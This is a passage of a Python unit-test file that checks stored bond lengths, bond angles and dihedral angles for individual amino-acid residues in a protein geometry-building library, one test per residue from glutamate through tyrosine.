111.1703\n assert g.N_C_CA_CB_diangle == 122.8702\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"E\"\n\n\ndef test_geometry_F():\n g = Geometry.geometry(\"F\")\n assert isinstance(g, PheGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 93.3\n assert g.CA_CB_CG_CD2_diangle == -86.7\n assert g.CA_CB_CG_angle == 113.85\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5316\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_CE1_diangle == 180.0\n assert g.CB_CG_CD1_angle == 120.0\n assert g.CB_CG_CD2_CE2_diangle == 180.0\n assert g.CB_CG_CD2_angle == 120.0\n assert g.CB_CG_length == 1.5\n assert g.CD1_CE1_CZ_angle == 120.0\n assert g.CD1_CE1_length == 1.39\n assert g.CD2_CE2_length == 1.39\n assert g.CE1_CZ_length == 1.39\n assert g.CG_CD1_CE1_CZ_diangle == 0.0\n assert g.CG_CD1_CE1_angle == 120.0\n assert 
g.CG_CD1_length == 1.39\n assert g.CG_CD2_CE2_angle == 120.0\n assert g.CG_CD2_length == 1.39\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.7\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.7528\n assert g.N_C_CA_CB_diangle == 122.6054\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"F\"\n\n\ndef test_geometry_G():\n g = Geometry.geometry(\"G\")\n assert isinstance(g, GlyGeo)\n\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5117\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_C_O_diangle == 180.0\n assert g.N_CA_C_angle == 110.8914\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"G\"\n\n\ndef test_geometry_H():\n g = Geometry.geometry(\"H\")\n assert isinstance(g, HisGeo)\n\n assert g.CA_CB_CG_CD2_diangle == 104.3\n assert g.CA_CB_CG_ND1_diangle == -75.7\n assert g.CA_CB_CG_angle == 113.74\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4732\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD2_NE2_diangle == 180.0\n assert g.CB_CG_CD2_angle == 130.61\n assert g.CB_CG_ND1_CE1_diangle == 180.0\n assert g.CB_CG_ND1_angle == 122.85\n assert g.CB_CG_length == 1.49\n assert g.CD2_NE2_length == 1.35\n assert g.CG_CD2_NE2_angle == 108.5\n assert g.CG_CD2_length == 1.35\n assert g.CG_ND1_CE1_angle == 108.5\n assert g.CG_ND1_length == 1.38\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.ND1_CE1_length == 1.32\n assert g.N_CA_CB_CG_diangle == -63.2\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.0859\n assert g.N_C_CA_CB_diangle == 122.6711\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"H\"\n\n\ndef test_geometry_I():\n g = Geometry.geometry(\"I\")\n assert isinstance(g, IleGeo)\n\n assert g.CA_CB_CG1_CD1_diangle == 169.8\n assert g.CA_CB_CG1_angle == 110.7\n assert g.CA_CB_CG2_angle == 110.4\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5403\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG1_CD1_angle == 113.97\n assert g.CB_CG1_length == 1.527\n assert g.CB_CG2_length == 1.527\n assert g.CG1_CD1_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG1_diangle == 59.7\n assert g.N_CA_CB_CG2_diangle == -61.6\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 109.7202\n assert g.N_C_CA_CB_diangle == 123.2347\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"I\"\n\n\ndef test_geometry_K():\n g = Geometry.geometry(\"K\")\n assert isinstance(g, LysGeo)\n\n assert g.CA_CB_CG_CD_diangle == -178.1\n assert g.CA_CB_CG_angle == 113.83\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.54\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_CE_diangle == -179.6\n assert 
g.CB_CG_CD_angle == 111.79\n assert g.CB_CG_length == 1.52\n assert g.CD_CE_NZ_angle == 124.79\n assert g.CD_CE_length == 1.46\n assert g.CE_NZ_length == 1.33\n assert g.CG_CD_CE_NZ_diangle == 179.6\n assert g.CG_CD_CE_angle == 111.68\n assert g.CG_CD_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.5\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.08\n assert g.N_C_CA_CB_diangle == 122.76\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"K\"\n\n\ndef test_geometry_L():\n g = Geometry.geometry(\"L\")\n assert isinstance(g, LeuGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 174.9\n assert g.CA_CB_CG_CD2_diangle == 66.7\n assert g.CA_CB_CG_angle == 116.1\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4647\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_angle == 110.27\n assert g.CB_CG_CD2_angle == 110.58\n assert g.CB_CG_length == 1.53\n assert g.CG_CD1_length == 1.524\n assert g.CG_CD2_length == 1.525\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -60.1\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.8652\n assert g.N_C_CA_CB_diangle == 122.4948\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"L\"\n\n\ndef test_geometry_M():\n g = Geometry.geometry(\"M\")\n assert isinstance(g, MetGeo)\n\n assert g.CA_CB_CG_SD_diangle == -179.6\n assert g.CA_CB_CG_angle == 113.68\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4816\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_SD_CE_diangle == 70.1\n assert g.CB_CG_SD_angle == 112.69\n assert g.CB_CG_length == 1.52\n assert g.CG_SD_CE_angle == 100.61\n assert g.CG_SD_length == 1.81\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.4\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.9416\n assert g.N_C_CA_CB_diangle == 122.6733\n assert g.SD_CE_length == 1.79\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"M\"\n\n\ndef test_geometry_N():\n g = Geometry.geometry(\"N\")\n assert isinstance(g, AsnGeo)\n\n assert g.CA_CB_CG_ND2_diangle == 121.7\n assert g.CA_CB_CG_OD1_diangle == -58.3\n assert g.CA_CB_CG_angle == 112.62\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4826\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_ND2_angle == 116.48\n assert g.CB_CG_OD1_angle == 120.85\n assert g.CB_CG_length == 1.52\n assert g.CG_ND2_length == 1.33\n assert g.CG_OD1_length == 1.23\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -65.5\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 111.5\n assert g.N_C_CA_CB_diangle == 123.2254\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"N\"\n\n\ndef 
test_geometry_P():\n g = Geometry.geometry(\"P\")\n assert isinstance(g, ProGeo)\n\n assert g.CA_CB_CG_CD_diangle == -34.8\n assert g.CA_CB_CG_angle == 104.21\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.2945\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_angle == 105.03\n assert g.CB_CG_length == 1.49\n assert g.CG_CD_length == 1.5\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == 29.6\n assert g.N_CA_C_O_diangle == -45.0\n assert g.N_CA_C_angle == 112.7499\n assert g.N_C_CA_CB_diangle == 115.2975\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"P\"\n\n\ndef test_geometry_Q():\n g = Geometry.geometry(\"Q\")\n assert isinstance(g, GlnGeo)\n\n assert g.CA_CB_CG_CD_diangle == -69.6\n assert g.CA_CB_CG_angle == 113.75\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5029\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_NE2_diangle == 129.5\n assert g.CB_CG_CD_OE1_diangle == -50.5\n assert g.CB_CG_CD_angle == 112.78\n assert g.CB_CG_length == 1.52\n assert g.CD_NE2_length == 1.33\n assert g.CD_OE1_length == 1.24\n assert g.CG_CD_NE2_angle == 116.5\n assert g.CG_CD_OE1_angle == 120.86\n assert g.CG_CD_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -60.2\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.0849\n assert g.N_C_CA_CB_diangle == 122.8134\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"Q\"\n\n\ndef test_geometry_R():\n g = Geometry.geometry(\"R\")\n assert isinstance(g, ArgGeo)\n\n assert g.CA_CB_CG_CD_diangle == -179.2\n assert g.CA_CB_CG_angle == 113.83\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.54\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_NE_diangle == -179.3\n assert g.CB_CG_CD_angle == 111.79\n assert g.CB_CG_length == 1.52\n assert g.CD_NE_CZ_NH1_diangle == 0.0\n assert g.CD_NE_CZ_NH2_diangle == 180.0\n assert g.CD_NE_CZ_angle == 124.79\n assert g.CD_NE_length == 1.46\n assert g.CG_CD_NE_CZ_diangle == -178.7\n assert g.CG_CD_NE_angle == 111.68\n assert g.CG_CD_length == 1.52\n assert g.CZ_NH1_length == 1.33\n assert g.CZ_NH2_length == 1.33\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.NE_CZ_NH1_angle == 120.64\n assert g.NE_CZ_NH2_angle == 119.63\n assert g.NE_CZ_length == 1.33\n assert g.N_CA_CB_CG_diangle == -65.2\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.98\n assert g.N_C_CA_CB_diangle == 122.76\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"R\"\n\n\ndef test_geometry_S():\n g = Geometry.geometry(\"S\")\n assert isinstance(g, SerGeo)\n\n assert g.CA_CB_OG_angle == 110.773\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_OG_length == 1.417\n assert g.C_CA_CB_angle == 109.5\n assert 
g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_OG_diangle == -63.3\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 111.2812\n assert g.N_C_CA_CB_diangle == 122.6618\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"S\"\n\n\ndef test_geometry_T():\n g = Geometry.geometry(\"T\")\n assert isinstance(g, ThrGeo)\n\n assert g.CA_CB_CG2_angle == 111.13\n assert g.CA_CB_OG1_angle == 109.18\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5359\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG2_length == 1.53\n assert g.CB_OG1_length == 1.43\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG2_diangle == -60.3\n assert g.N_CA_CB_OG1_diangle == 60.0\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.7014\n assert g.N_C_CA_CB_diangle == 123.0953\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"T\"\n\n\ndef test_geometry_V():\n g = Geometry.geometry(\"V\")\n assert isinstance(g, ValGeo)\n\n assert g.CA_CB_CG1_angle == 110.7\n assert g.CA_CB_CG2_angle == 110.4\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5686\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG1_length == 1.527\n assert g.CB_CG2_length == 1.527\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG1_diangle == 177.2\n assert g.N_CA_CB_CG2_diangle == -63.3\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 109.7698\n assert g.N_C_CA_CB_diangle == 123.2347\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"V\"\n\n\ndef test_geometry_W():\n g = Geometry.geometry(\"W\")\n assert isinstance(g, TrpGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 96.3\n assert g.CA_CB_CG_CD2_diangle == -83.7\n assert g.CA_CB_CG_angle == 114.1\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5117\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_NE1_diangle == 180.0\n assert g.CB_CG_CD1_angle == 127.07\n assert g.CB_CG_CD2_CE2_diangle == 180.0\n assert g.CB_CG_CD2_CE3_diangle == 0.0\n assert g.CB_CG_CD2_angle == 126.66\n assert g.CB_CG_length == 1.5\n assert g.CD1_NE1_length == 1.38\n assert g.CD2_CE2_CZ2_CH2_diangle == 0.0\n assert g.CD2_CE2_CZ2_angle == 120.0\n assert g.CD2_CE2_length == 1.4\n assert g.CD2_CE3_CZ3_angle == 120.0\n assert g.CD2_CE3_length == 1.4\n assert g.CE2_CZ2_CH2_angle == 120.0\n assert g.CE2_CZ2_length == 1.4\n assert g.CE3_CZ3_length == 1.4\n assert g.CG_CD1_NE1_angle == 108.5\n assert g.CG_CD1_length == 1.37\n assert g.CG_CD2_CE2_CZ2_diangle == 180.0\n assert g.CG_CD2_CE2_angle == 108.5\n assert g.CG_CD2_CE3_CZ3_diangle == 180.0\n assert g.CG_CD2_CE3_angle == 133.83\n assert g.CG_CD2_length == 1.43\n assert g.CZ2_CH2_length == 1.4\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -66.4\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.8914\n assert g.N_C_CA_CB_diangle == 122.6112\n assert 
g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"W\"\n\n\ndef test_geometry_Y():\n g = Geometry.geometry(\"Y\")\n assert isinstance(g, TyrGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 93.1\n assert g.CA_CB_CG_CD2_diangle == 273.1\n assert g.CA_CB_CG_angle == 113.8\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5434\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_CE1_diangle == 180.0\n assert g.CB_CG_CD1_angle == 120.98\n assert g.CB_CG_CD2_CE2_diangle == 180.0\n assert g.CB_CG_CD2_angle == 120.82\n assert g.CB_CG_length == 1.51\n assert g.CD1_CE1_CZ_OH_diangle == 180.0\n assert g.CD1_CE1_CZ_angle == 120.0\n assert g.CD1_CE1_length == 1.39\n assert g.CD2_CE2_length == 1.39\n assert g.CE1_CZ_OH_angle == 119.78\n assert g.CE1_CZ_length == 1.39\n assert g.CG_CD1_CE1_CZ_diangle == 0.0\n assert g.CG_CD1_CE1_angle == 120.0\n assert g.CG_CD1_length == 1.39\n assert g.CG_CD2_CE2_angle == 120.0\n assert g.CG_CD2_length == 1.39\n assert g.CZ_OH_length == 1.39\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.3\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.9288\n assert g.N_C_CA_CB_diangle == 122.6023\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"Y\"\n" } ]
9
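A minimal usage sketch for the PeptideBuilder record above -- not part of the repository itself, and assuming the package and Biopython are installed as its README describes. It combines the make_structure() call exercised in tests/test_PeptideBuilder.py with the PDB output step from examples/simpleExample.py; the output file name is an illustrative choice.

import Bio.PDB
import PeptideBuilder

# The same slowly varying backbone angles checked by test_make_structure():
phi_list = [-60 + i for i in range(1, 20)]
psi_im1_list = [-40 - i for i in range(1, 20)]

# Build a 20-residue helix and cap the final residue with a terminal oxygen.
structure = PeptideBuilder.make_structure("ACDEFGHIKLMNPQRSTVWY", phi_list, psi_im1_list)
PeptideBuilder.add_terminal_OXT(structure)

out = Bio.PDB.PDBIO()
out.set_structure(structure)
out.save("helix_all20.pdb")  # hypothetical output file name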
pedroslark/Acens
https://github.com/pedroslark/Acens
5aa74349a5d2c4bf2c8fb9000e511bbcdb638b6b
a0cbd30f9eaa2a15209a501ccee6f9290e85b140
f3e0e8625c737bf895386e8f41609c7507a33efb
refs/heads/master
2021-04-03T05:39:14.891143
2016-05-27T15:43:03
2016-05-27T15:43:03
59,844,160
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3961038887500763, "alphanum_fraction": 0.44155845046043396, "avg_line_length": 13, "blob_id": "4acd762582fd30c0fae745c6049f438f4ffc3d4b", "content_id": "5f4e13676c660bb2bd3ebbbc58c049b8da315a5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 27, "num_lines": 11, "path": "/Q2py/Q2.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "count = 0\nfor i in range (9):\n if i != 3:\n for j in range (6):\n print('oi')\n count += 1\nprint count\n\n#48 \"oi's\"\n\n#GG easy\n" }, { "alpha_fraction": 0.42696627974510193, "alphanum_fraction": 0.49438202381134033, "avg_line_length": 8.88888931274414, "blob_id": "2f5f2f4e602ee99629c8bd41ef081eb8b2e1241f", "content_id": "0fb136b8d6c1e88539336cc0f6559d5e35921076", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 25, "num_lines": 9, "path": "/Q1py/Q1.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "x = 2\ny = 5\nif y > 8:\n y = y*2\nelse:\n x = x*2\nprint x+y\n\n#A saida do programa eh 9\n" }, { "alpha_fraction": 0.5885885953903198, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 29.272727966308594, "blob_id": "4f81c0f03a96e1ed278662b99c268b8bfb782465", "content_id": "7fe71ba3f21e12ba7683faf58dbe52ebfe21e843", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/Q6py/Q6py/spiders/siasdo_spider.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "import scrapy\n\nclass SiasdoSpider(scrapy.Spider):\n name = \"siasdo\"\n allowed_domains = [\"siasdo.com.br\"]\n start_urls = [\"http://siasdo.com.br\"]\n\n def parse(self, response):\n for sel in response.xpath('//section/div/ul/li'):\n desc = sel.xpath('text()').extract()\n print desc[0].encode('utf-8')\n" }, { "alpha_fraction": 0.6338174343109131, "alphanum_fraction": 0.636929452419281, "avg_line_length": 27.352941513061523, "blob_id": "0cf7bd903641cb449494d26f21f5a843b5df70e4", "content_id": "24d5f532270676e027360caef481d209db7352d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 964, "license_type": "no_license", "max_line_length": 84, "num_lines": 34, "path": "/Q7py/Q7.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "def encrypt(text, key):\n encrypted_text = ''\n alphabet, encrypted_alphabet = get_alphabet(key)\n\n for char in text:\n if char == ' ': encrypted_text += ' '\n else: encrypted_text += encrypted_alphabet[alphabet.index(char)]\n return encrypted_text\n\ndef decrypt(text, key):\n decrypted_text = ''\n alphabet, encrypted_alphabet = get_alphabet(key)\n\n for char in text:\n if char == ' ': decrypted_text += ' '\n else: decrypted_text += alphabet[encrypted_alphabet.index(char)]\n return decrypted_text\n\ndef get_alphabet(key):\n alphabet = [chr(x) for x in range(ord('a'), ord('z')+1)]\n encrypted_alphabet = []\n for i in range(len(alphabet)):\n if i < key: encrypted_alphabet.append(alphabet[i])\n else: encrypted_alphabet.insert(encrypted_alphabet.index('a'), alphabet[i])\n return alphabet, encrypted_alphabet\n\n# testing \\/\na = 'hello world'\nb = encrypt(a, 5)\nc = decrypt(b, 5)\n\nprint a\nprint b\nprint c\n" }, { "alpha_fraction": 0.7437499761581421, 
"alphanum_fraction": 0.7437499761581421, "avg_line_length": 16.77777862548828, "blob_id": "81b722ce9e949833b416d2ed6ae61a20167ae470", "content_id": "a5039968abbe906b76230944322bee49da255629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 160, "license_type": "no_license", "max_line_length": 65, "num_lines": 9, "path": "/README.md", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "# Acens\n\n>A simple repository to upload and show my answers in Acens test.\n\n>No license.\n\n>Each question is in it's own folder.\n\n>Everything was made in Python\n" }, { "alpha_fraction": 0.5985662937164307, "alphanum_fraction": 0.6272401213645935, "avg_line_length": 23.2608699798584, "blob_id": "437449854e3c06d5c97edf0835f0eacc18f693e4", "content_id": "eb4ed6dbb1cdfd2890c75590d764c18590266ced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 558, "license_type": "no_license", "max_line_length": 74, "num_lines": 23, "path": "/Q5py/Q5.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "with open('numbers.txt', 'r') as myfile:\n data = myfile.read().replace('\\n', ' ')[:-1]\n\nnumbers = data.split()\nnumbers1 = []\n\nfor number in numbers:\n consecutive = False\n for i in range(len(number)-1):\n if number[i] == number[i+1]: consecutive = True\n if not consecutive: numbers1.append(number)\n\nnumbers2 = []\nfor number in numbers1:\n sum = 0\n for i in number: sum += int(i)\n if sum % 2 == 0: numbers2.append(number)\n\nnumbers3 = [number for number in numbers2 if number[0] is not number[-1:]]\n\nprint len(numbers3)\n\n## gg easy :)\n" }, { "alpha_fraction": 0.5699300765991211, "alphanum_fraction": 0.6468531489372253, "avg_line_length": 18.066667556762695, "blob_id": "6b801ef9d48f171e07c5bec3ef24b0e57bb19f39", "content_id": "15c0512dc95c1187974f985a30bee2895e829ad5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/Q3py/Q3.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "country_a = 80000\ncountry_b = 200000\ncount = 0\n\nwhile country_a < country_b:\n country_a = country_a + (country_a * 0.03)\n country_b = country_b + (country_b * 0.015)\n\n count += 1\n\nprint count\n\n#63 anos para o país A ultrapassar, ou igualar, à população do país B.\n\n#gg easy :D\n" }, { "alpha_fraction": 0.7403650879859924, "alphanum_fraction": 0.7484787106513977, "avg_line_length": 31.866666793823242, "blob_id": "da97e2249ff0fe1446549ef618bf95509068b35f", "content_id": "0b614619661d0afcc529140678d1ca01141a5bc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 493, "license_type": "no_license", "max_line_length": 198, "num_lines": 15, "path": "/Q6py/README.md", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "#Question 6\n\n>For this question i've used the crawling framework [Scrapy](http://scrapy.org).\n\n>I've made a simple spider to get the information from the website and print in the console. You can see it [here](https://github.com/pedroslark/Acens/blob/master/Q6py/Q6py/spiders/siasdo_spider.py)\n\n###Running\n\nTo run it, you must have Scrapy installed in your macbine. 
You can install it by:\n\n`<pip install scrapy>`\n\nGo to the root directory of the project \"Q6\" and run:\n\n`<scrapy crawl siasdo>`\n" }, { "alpha_fraction": 0.4623115658760071, "alphanum_fraction": 0.5125628113746643, "avg_line_length": 17.904762268066406, "blob_id": "afe53abd5f138586a0e8d7ecc9d9b4239229f562", "content_id": "193eb640ea3fca3d59df25f4a4cd7926c25ae0f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 74, "num_lines": 21, "path": "/Q4py/Q4.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "A = []\nB = []\nV = []\n\nwhile len(A) < 10:\n i = input('Digite um numero inteiro, entre 1 e 100, para o vetor A: ')\n if i >= 1 and i <= 100:\n A.append(i)\n\nwhile len(B) < 10:\n i = input('Digite um numero inteiro, entre 1 e 100, para o vetor B: ')\n if i >= 1 and i <= 100:\n B.append (i)\n\nfor x in range (len(A) ):\n V.append (A[x])\n V.append (B[x])\n\nprint V\n\n#GG easy :)\n\n" } ]
9
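The alphabet rotation built by get_alphabet() in Q7.py above amounts to a classic Caesar shift, so the same cipher can be written with modular index arithmetic. A sketch of that alternative formulation (not part of the repository; the function names are hypothetical):

def caesar_encrypt(text, key):
    # Shift each lowercase letter forward by `key`, leaving spaces untouched --
    # the same mapping Q7.py produces by rotating its alphabet list.
    return ''.join(
        ch if ch == ' ' else chr((ord(ch) - ord('a') + key) % 26 + ord('a'))
        for ch in text
    )

def caesar_decrypt(text, key):
    return caesar_encrypt(text, -key)  # shifting back by the same key inverts it

assert caesar_decrypt(caesar_encrypt('hello world', 5), 5) == 'hello world'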
Aeres-u99/Linux-Quotes
https://github.com/Aeres-u99/Linux-Quotes
3be27bd71e8b2caecc0b19472b8f30e0fbce9bca
0eaed334512a7bcd48d754a827fb5d2b759efdcc
e72945af9ce589e534be5abbc3233e9f3c6b7eac
refs/heads/main
2023-01-20T21:48:57.577380
2020-11-27T12:03:13
2020-11-27T12:03:13
316,419,090
1
1
null
null
null
null
null
